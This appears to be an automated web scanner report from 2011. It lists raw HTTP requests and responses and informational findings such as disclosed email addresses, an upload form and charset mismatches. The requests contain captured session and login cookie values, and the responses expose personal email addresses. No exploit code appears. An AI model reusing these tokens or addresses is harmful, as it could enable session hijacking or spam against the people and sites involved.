HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Apr 2011 12:49:55 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding Content-Length: 37063
<script type="text/javascript" src="//secure.comodo.com/hostedLogin/sha1.js"></script> <script type="text/javascript" src="//secure.comodo.com/hostedLogin/login.js"></script> ...[SNIP]... <!--google--> <script type="text/javascript" src="//google-analytics.com/urchin.js"></script> ...[SNIP]... <!-- BEGIN HumanTag Monitor. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG --><script type="text/javascript" src='https://server.iad.liveperson.net/hc/61298727/x.js?cmd=file&file=chatScript3&site=61298727&&imageUrl=http://www.instantssl.com/ssl-certificate-images/liveperson/sales'> </script> ...[SNIP]... </script> <script type="text/javascript" src="//secure.comodo.com/prices.js"></script> ...[SNIP]...
The page contains a form which is used to submit a user-supplied file to the following URL:
https://account.snap.com/submit_logo.php
Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.
Request
GET /signup.php HTTP/1.1 Host: account.snap.com Connection: keep-alive Referer: http://www.snap.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The following email address was disclosed in the response:
pat@barelyfitz.com
Request
GET /wp-content/themes/WP_Premium/WP_Premium/taber.js HTTP/1.1 Host: blog.ikano.com Proxy-Connection: keep-alive Referer: http://blog.ikano.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=18335905.1303823875.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18335905.1341540347.1303823875.1303823875.1303823875.1; __utmc=18335905; __utmb=18335905.6.10.1303823875
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:18:26 GMT Server: Apache/2.0.59 (CentOS) Last-Modified: Mon, 30 Jun 2008 21:48:20 GMT ETag: "18c5c9-3ea7-37c37100" Accept-Ranges: bytes Content-Length: 16039 Connection: close Content-Type: application/x-javascript
/*================================================== $Id: tabber.js,v 1.9 2006/04/27 20:51:51 pat Exp $ tabber.js by Patrick Fitzgerald pat@barelyfitz.com
Documentation can be found at the following URL: http://www.barelyfitz.com/projects/tabber/
/** * Cookie plugin * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu. ...[SNIP]... ll be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */
/** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) {
The following email address was disclosed in the response:
free2rhyme@yahoo.com
Request
GET /config/login?.done=http://downloads.yahoo.com%2findex.php&.src=ydl&.intl=us HTTP/1.1 Host: login.yahoo.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; ysf=08QxMuCE5xcRp6XxvP9UqQQVFjUnPTRIkxcDabYECLHYlgjWjedO.aMI9RGj2l09q.GrzSj0ZGNpKWL4tC5RhhHyRxFHPlU.kFCMEd44rNZiy50Es8NrBu7yXU0mNtf0YtrWeEjpo31kxbqrG0YGBvIbxraTXVC9nbjUpNtv9aXJppMZot2l11h5_ZSFAPhtqxX_6SVAEVGb0NKTjuEX9ZYv2zDAxiWP9cGTqFS0cy9sv336lSqBJx7SukerpgGajbVm5ixswV527gxjaF3uyCr7m1vg_4ERgH_kHGmM1GC3lZg7kpdA4se.Qgpe8f7RJkYS8crdx364dtmP6Js16W8_gxE1rMXJs1u9F8J4fm3eQRNc_54_vpkaiaTqfiqOcFZODhj_ghb_GOxG1FWZmW.i2zsaspuKA4yive5ZswfNSY0PlT8WhNaRhUIxTsKui8a4VYdjdz.5HLTMtIko4yhA
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:55:23 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 42663
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sign in ...[SNIP]... <p id='ex'>(e.g. free2rhyme@yahoo.com)</p> ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://mydownload.paretologic.safecart.com/pcha ...[SNIP]... <a href="mailto:systemsupport@revenuewire.com"> ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Deter ...[SNIP]... <div class="section"> If you need help determining your Merchant SAQ Type please contact a SecurityMetrics Compliance Consultant at 801.705.5665 (USA), 020.7993.8030 (UK) or compliance@securitymetrics.com </div> ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Deter ...[SNIP]... <div class="section"> If you need help determining your Merchant SAQ Type please contact a SecurityMetrics Compliance Consultant at 801.705.5665 (USA), 020.7993.8030 (UK) or compliance@securitymetrics.com </div> ...[SNIP]...
// // +----------------------------------------------------------------------+ // |zen-cart Open Source E-commerce | // +-------------------------------------- ...[SNIP]... e/2_0.txt. | // | If you did not receive a copy of the zen-cart license and are unable | // | to obtain it through the world-wide-web, please send a note to | // | license@zen-cart.com so we can mail you a copy immediately. | // +----------------------------------------------------------------------+ // $Id: general.js 1105 2005-04-04 22:05:35Z birdbrain $ //
The following email addresses were disclosed in the response:
nigel@nigel.geek.nz
p.hailey@virgin.net
tim@breakmyzencart.com
Request
GET /includes/templates/tenable/jscript/jscript_imagehover.js HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Response
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 23:46:41 GMT Server: Apache Last-Modified: Wed, 05 Jan 2011 15:53:32 GMT ETag: "12ee23-1c93-630ff700" Accept-Ranges: bytes Content-Length: 7315 Connection: close Content-Type: application/x-javascript
/* Simple Image Trail script- By JavaScriptKit.com Visit http://www.javascriptkit.com for this script and more This notice must stay intact
Image Handler Jscript Version 4.2 fix for horizontalscrollbar 23 june 2010 This version brings in Opera support, and fixes the webkit (Safari and Chrome) Bugs Modified by Nigel Thomson (nigel@nigel.geek.nz) 12 June 2010 http://nigeltsblog.blogspot.com/2010/06/zencart-image-handler-webkit-and-opera.html
MODIFIED by p.hailey@virgin.net ie 6 fix attempt see zencart forum IH2 thread Modified by Tim Kroeger (tim@breakmyzencart.com) for use with image handler 2 and better cross browser functionality */ var offsetfrommouse=[10,10]; //image x,y offsets from cursor position in pixels. Enter 0,0 for no offset var displayduration ...[SNIP]...
<!doctype html> <html lang="en" dir="ltr" lang="en"> <head> <title>1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - $3,600.00 : Tenable Store, Unified Security Monitoring</title> <meta ...[SNIP]... <a href="mailto:sales@tenable.com">sales@tenable.com</a> ...[SNIP]... not be returned. Product cannot be returned after 30 days from purchase date. If you return the product prior to registration within 30 days, there will be a restocking fee. Please contact us at sales@tenable.com to determine the fee. </p> ...[SNIP]...
SERVERS = new Array(); SERVERS[1] = new Array("HedgehogServer-jre-installer-4.1.0-15470.exe", 64, false); SERVERS[2] = new Array("sentrigo-server-jre-4.1.0-15470.i586.rpm.bin", 118, false); SERVERS[3] ...[SNIP]... <a href=\"mailto:support@sentrigo.com?subject=Hedgehog sensor availability for additional platform\"> ...[SNIP]... <a href=\"mailto:support@sentrigo.com?subject=Query about Hedgehog Server for additional OS\"> ...[SNIP]... <a href=\"mailto:support@sentrigo.com?subject=Query about IDentifier for additional OS\"> ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://threats2.paretologic.safecart.com/pcha/d ...[SNIP]... <a href="mailto:systemsupport@revenuewire.com"> ...[SNIP]...
/*HM_ScriptDOM.js * by Peter Belesis. v4.3 020605 * Copyright (c) 2002 Peter Belesis. All Rights Reserved. * Originally published and documented at http://www.dhtmlab.com/ * Available solely from INT Media Group. Incorporated under exclusive license. * Contact licensing@internet.com for more information. */
/*HM_ScriptDOM.js * by Peter Belesis. v4.3 020605 * Copyright (c) 2002 Peter Belesis. All Rights Reserved. * Originally published and documented at http://www.dhtmlab.com/ * Available solely from INT Media Group. Incorporated under exclusive license. * Contact licensing@internet.com for more information. */
/** * jCarouselLite - jQuery plugin to navigate images/any content in a carousel style widget. * @requires jQuery v1.2 or above * * http://gmarwaha.com/jquery/jcarousellite/ * * Copyright ...[SNIP]... llbacks. The functions will be passed an argument that represents an array of elements that * are visible at the time of callback. * * * @cat Plugins/Image Gallery * @author Ganeshji Marwaha/ganeshread@gmail.com */
(function($) { // Compliant with jquery.noConflict() $.fn.jCarouselLite = function(o) { o = $.extend({ btnPrev: null, btnNext: ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <script type="text/javascript"> lang.LoginEnterValidEmail = "Please type in a valid email address, such as joe@aol.com"; lang.LoginEnterPassword = "Please type in your password."; lang.AccountEnterPassword = "Please type in a password."; lang.AccountPasswordsDontMatch = "Your passwords don't match.";
/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net) * Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) * and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses. * * $LastCha ...[SNIP]...
function trimAll(A){while(A.substring(0,1)==" "){A=A.substring(1,A.length);}while(A.substring(A.length-1,A.length)==" "){A=A.substring(0,A.length-1); }return A;}var ShowErrorSummary=function(){var A= ...[SNIP]... ave provided is not complete or contains invalid characters which prevent your message from being processed. Please check to ensure that the address you have provided is in the proper format (example: jdoe@domain.com)."; var errEmailMissing="Please enter your e-mail address in both the Enter and Confirm fields."; var errEmailMismatch="E-mail addresses in the Enter and Confirm fields must match."; var errorMessa ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" > <head lang="en-us"><met ...[SNIP]... <a title="This link will launch an email message in the default email provider" href="mailto:wealthmanagement@bankofamerica.com?body=Please note: E-mail sent using this feature is not encrypted or secured by Bank of America. Do not send any account, trade or other related confidential information on this system."> ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.backbonesecurity.com/interior.cfm?itemCategory=39808&siteid=418&pr ...[SNIP]... <input type ="hidden" NAME="sendto" VALUE="jeff@aagg.com"> ...[SNIP]...
/* Prototype JavaScript framework, version 1.6.1 * (c) 2005-2009 Sam Stephenson * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype ...[SNIP]...
GET /products/!hostedLogin HTTP/1.1 Host: secure.comodo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wooTracker=ZQXK7Q954RCS6ZFI1HH4JS1QZ5D1UD01;
<html> <body> Insecure Login Attempt: Your password may have been compromised. <br><br>Please login <a href=https://secure.comodo.com/products/frontpage>here</a> and change your password immedia ...[SNIP]...
GET / HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /ccc01/comment_card.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 6067 Content-Type: text/html; Charset=UTF-8 X-Powered-By: ASP.NET Date: Tue, 26 Apr 2011 12:41:01 GMT Connection: close
<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-16"> <base href="https://secure.opinionlab.com/ccc01"> <title>Comment Ca ...[SNIP]...
GET /ccc01/comment_card_d.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>SecurityMe ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Deter ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Deter ...[SNIP]...
GET /snap_shots.js HTTP/1.1 Host: shots-s.snap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
//<!-- /*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved. * Your use of this code is subject to the Snap Shots Terms of Service * located at https://account.snap ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- Hackerguardian Home ...[SNIP]...
GET / HTTP/1.1 Host: www.instantssl.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Apr 2011 12:49:54 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding Content-Length: 30428
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>SSL Certificate F ...[SNIP]...
GET /ssl-certificate-products/ HTTP/1.1 Host: www.instantssl.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Apr 2011 12:49:55 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding Content-Length: 37063
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <!--START GWO HEADER --> <!--GW ...[SNIP]...
GET /download/id/MF44CZE68YE67AM0F4PA6VRH3C4HRRKV HTTP/1.1 Host: www.mavitunasecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 23783536 Content-Type: application/octet-stream X-Powered-By: ASP.NET Content-Disposition: attachment; filename=NetsparkerSetup.exe Date: Tue, 26 Apr 2011 12:49:56 GMT Connection: close
MZ......................@............................................. .!..L.!This program cannot be run in DOS mode. $.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i..i...it..iRichu..i........ ...[SNIP]...
GET /support/checkupdate/?lic=AAEAAAD/////AQAAAAAAAAAGAQAAAD4wNDYyLTZFNTctOTc3OS1EOTk4LUNBNTctRUU1QS1NRjQ0Q1pFNjhZRTY3QU0wRjRQQTZWUkgzQzRIUlJLVgs= HTTP/1.1 Host: www.mavitunasecurity.com
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 87 Content-Type: text/html; charset=utf-8 X-Powered-By: ASP.NET Date: Tue, 26 Apr 2011 12:27:30 GMT
...<?xml version="1.0" encoding="utf-8" ?> <Settings> <Domain>.merrilledge.com</Domain> <LivePersonUnit>MLDSales</LivePersonUnit> <TestLpNumber>19026173</TestLpNumber> <!-- use for testing p ...[SNIP]...
<html> <head> <title>Net-Address UK and international domain name registration including .com and .co.uk, with control panel management</title> <meta http-equiv="content-type" content="text/html; c ...[SNIP]...
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 00:03:56 GMT Server: Apache/2.2.15 (Unix) Connection: close Content-Type: text/html Content-Length: 6496
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>shop c ...[SNIP]...
Page=new Array(); Page[0]=new Array("When you first log into the course, you will be presented with the Instruction screen. Pop-Up Blockers will stop this from automatically coming up. To view, simpl ...[SNIP]... </title>\n"; Result+="<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>\n"; Result+='<script language="javascript" type="text/javascript" charset="utf-8" src="dhtml_search.js"> ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://pc ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IKANO.com - Inter ...[SNIP]...
GET /PostLead.aspx HTTP/1.1 Host: landingpage.leads.dynamicssite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /pixel.jsp?id=2773,2759,2761,2791&type=script&ipid=10143&sfid=0 HTTP/1.1 Host: pixel.intellitxt.com Proxy-Connection: keep-alive Referer: http://spamlaws.us.intellitxt.com/iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2759%2C2761%2C2791%26type%3Dscript%26ipid%3D10143%26sfid%3D0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eoAAACucBAAAAAQAAAS+SL16gAAAK1QEAAAABAAABL5IvXqAAAArHAQAAAAEAAAEvki9eoAAAAACIhXZ+; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:08 GMT; Path=/ Content-Type: text/html Content-Length: 1602 Date: Tue, 26 Apr 2011 14:21:08 GMT Connection: close
GET /iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2759%2C2761%2C2791%26type%3Dscript%26ipid%3D10143%26sfid%3D0 HTTP/1.1 Host: spamlaws.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: text/html Content-Length: 162 Date: Tue, 26 Apr 2011 14:21:07 GMT Age: 0 Connection: keep-alive
<HEAD><TITLE>403: Access Forbidden</TITLE></HEAD> <BODY><FONT COLOR="#CC0000"><b>Due to the presence of characters known to be used in Cross Site Scripting attacks, access is forbidden. This web site ...[SNIP]...
<HEAD><TITLE>403: Access Forbidden</TITLE></HEAD> <BODY><FONT COLOR="#CC0000"><b>Due to the presence of characters known to be used in Cross Site Scripting attacks, access is forbidden. This web site ...[SNIP]...
<HEAD><TITLE>403: Access Forbidden</TITLE></HEAD> <BODY><FONT COLOR="#CC0000"><b>Due to the presence of characters known to be used in Cross Site Scripting attacks, access is forbidden. This web site ...[SNIP]...
<HEAD><TITLE>403: Access Forbidden</TITLE></HEAD> <BODY><FONT COLOR="#CC0000"><b>Due to the presence of characters known to be used in Cross Site Scripting attacks, access is forbidden. This web site ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.backbonesecurity.com/interior.cfm?itemCategory=39808&siteid=418&pr ...[SNIP]...
GET /cgi-bin/shopcart/cart.pl HTTP/1.1 Host: www.saintcorporation.com Proxy-Connection: keep-alive Referer: http://www.saintcorporation.com/products/order.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=23724856.1303775066.1.1.utmgclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=23724856.513666181.1303775066.1303775066.1303775066.1; __utmc=23724856; __utmb=23724856.1.10.1303775066
Response
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 23:57:37 GMT Server: Apache/2.2.15 (Unix) Connection: close Content-Type: text/html Content-Length: 13403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>shop c ...[SNIP]...
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 00:03:56 GMT Server: Apache/2.2.15 (Unix) Connection: close Content-Type: text/html Content-Length: 6496
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>shop c ...[SNIP]...
The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:
UTF-16
UTF-8
Request
GET /ccc01/comment_card.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 6067 Content-Type: text/html; Charset=UTF-8 X-Powered-By: ASP.NET Date: Tue, 26 Apr 2011 12:41:01 GMT Connection: close
<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-16"> <base href="https://secure.opinionlab.com/ccc01"> <title>Comment Ca ...[SNIP]...
The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:
UTF-16
UTF-8
Request
GET /ccc01/comment_card_d.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:
UTF-16
UTF-8
Request
GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
/* Prototype JavaScript framework, version 1.6.1 * (c) 2005-2009 Sam Stephenson * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype ...[SNIP]...
HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Apr 2011 14:21:27 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 42
/* Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved. * Your use of this code is subject to the Snap Shots Terms of Service * located at https://account.snap.com/pri ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /PostLead.aspx HTTP/1.1 Host: landingpage.leads.dynamicssite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.
Request
